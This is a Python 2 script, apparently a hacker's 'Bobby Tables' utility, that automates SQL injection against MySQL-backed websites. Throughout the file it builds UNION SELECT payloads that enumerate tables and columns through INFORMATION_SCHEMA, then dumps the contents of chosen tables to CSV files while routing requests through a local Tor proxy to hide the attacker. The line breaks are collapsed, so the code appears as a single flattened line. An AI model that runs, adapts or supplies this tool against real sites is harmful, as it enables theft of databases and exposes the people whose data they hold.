#!/usr/bin/python # Bobby Tables MySQL Data Extraction utility # Extracts data from MySQL databases via SQL injection # v1.2 !!!!! # http://twitter.com/info_dox # www.infodox.co.cc # blog.infodox.co.cc import urllib import sys import getopt import string import os import time def convert_char(element): char_element = 'char(' for charac in element: char_element += str(ord(charac))+',' char_element = char_element[:-1]+')' return char_element print("Welcome to Bobby Tables SQL Injection Utility") print("If your vulnURL is www.blah.com/vuln.php?id=1&page=2[INJECTHERE]&pl0x=3") print("Then first part of the URL is www.blah.com/vuln.php?id=1&page=2") print("The rest is the second part. If there is no second part leave that field blank or something!") base_url_start = raw_input("First part of the vuln URL: ") base_url_end = raw_input("Second part of the vuln URL: ") # Second part of the vuln URL proxies = {'http': 'http://127.0.0.1:8118'} # IP:Port of TOR running on Localhost #change if the page source already contains the delimiter string string_delimiter = '-----' string_delimiter_char = convert_char(string_delimiter) #change if the page source already contains the column delimiter string column_delimiter = '!!!!!' column_delimiter_char = convert_char(column_delimiter) #increase to increase speed but make sure that the results wont be cut.... results_limit = str(10) def print_options(tables): idx = 1 column = 0 line = '' for table in tables: if (len(str(idx)) == 1): idx_str = ' '+str(idx) if (len(str(idx)) == 2): idx_str = ' '+str(idx) if (len(str(idx)) == 3): idx_str = str(idx) if idx == len(tables): print line+'\n\n\t -1 -\tAll\t\t\t 0 - \tExit' else: if column == 3: if (len(table) > 12): line += '\t'+idx_str + ' - ' +table[:12]+'...\t' else: if (len(table) <=9): if (len(table) <=6): line += '\t'+idx_str + ' - ' +table+' \t\t' else: line += '\t'+idx_str + ' - ' +table+' \t' else: line += '\t'+idx_str + ' - ' +table+' \t' print line line = '' column = 0 else: if (len(table) > 12): line += '\t'+idx_str + ' - ' +table[:12]+'...\t' else: if (len(table) <=9): if (len(table) <=6): line += '\t'+idx_str + ' - ' +table+' \t\t' else: line += '\t'+idx_str + ' - ' +table+' \t' else: line += '\t'+idx_str + ' - ' +table+' \t' column +=1 idx += 1 def extract_table(table_name, time_per_get): try: print "Extracting "+table_name+ " table" table_arg = table_name fw = open(table_arg+'.csv', 'w') #convert table name to char(xxx,xxx...) table = convert_char(table_arg) #get column list get_columns_data = base_url_start + '%20union%20select%201,2,concat('+string_delimiter_char+',(select%20group_concat(column_name)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%20=%20'+table+'%20and%20table_schema=database()),'+string_delimiter_char+'),4,5,6'+base_url_end page = urllib.urlopen(get_columns_data) columns = string.split(string.split(page.read(),string_delimiter)[1],',') #get table count get_table_count = base_url_start + '%20union%20select%201,2,concat('+string_delimiter_char+',(select%20count(*)%20FROM%20'+table_arg+'),'+string_delimiter_char+'),4,5,6'+base_url_end page = urllib.urlopen(get_table_count) row_count = string.split(string.split(page.read(),string_delimiter)[1],',') print 'Rows:' print row_count[0] eta = ((float(row_count[0]) * float(len(columns))) / float(results_limit)) * float(time_per_get) print "ETA: "+str((int(eta)) / 60 ) + ' minutes' if (int(row_count[0]) > 0): #create file header header = '' for column in columns: header += column +',' print 'Extracting columns:' print header iterations = (int(row_count[0]) / int(results_limit)) +1 order_by = columns[0] for column in columns: current_offset = 0 current_column_data = column + ':' for row_id in range(iterations): get_row_data = base_url_start + '%20union%20select%201,2,concat('+string_delimiter_char+',(select%20group_concat(t.row1,'+column_delimiter_char+')%20FROM%20(select%20'+column+'%20as%20row1%20FROM%20'+table_arg+'%20order%20by%20'+order_by+'%20LIMIT%20'+str(current_offset)+','+results_limit+')%20as%20t),'+string_delimiter_char+'),4,5,6'+base_url_end page = urllib.urlopen(get_row_data) try: row_data = string.split(string.split(page.read(),string_delimiter)[1],column_delimiter+',') except: pass row_data[len(row_data)-1] = row_data[len(row_data)-1][:-1*(len(column_delimiter))] current_offset += int(results_limit) for data_r in row_data: current_column_data += data_r+',' fw.write(current_column_data[:-1]+'\n') fw.flush() os.fsync(fw.fileno()) fw.close() else: print "The table has no rows" except ValueError: print ValueError #"some stupid error ocurred... " def main(): t0 = time.time() #get table list get_table_list = base_url_start + '%20union%20select%201,2,concat('+string_delimiter_char+',(select%20group_concat(table_name)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20%20table_schema=database()),'+string_delimiter_char+'),4,5,6'+base_url_end page = urllib.urlopen(get_table_list) tables = string.split(string.split(page.read(),string_delimiter)[1],',') time_per_get = time.time() - t0 while True: try: print_options(tables) option = str(input('\nChose table: ')) try: if str(option) == '0': return except: pass if int(option) == -1: for table in tables: extract_table(table, time_per_get) else: print 'wtf?' extract_table(tables[int(option) -1], time_per_get) option = '' except: pass if __name__ == "__main__": main()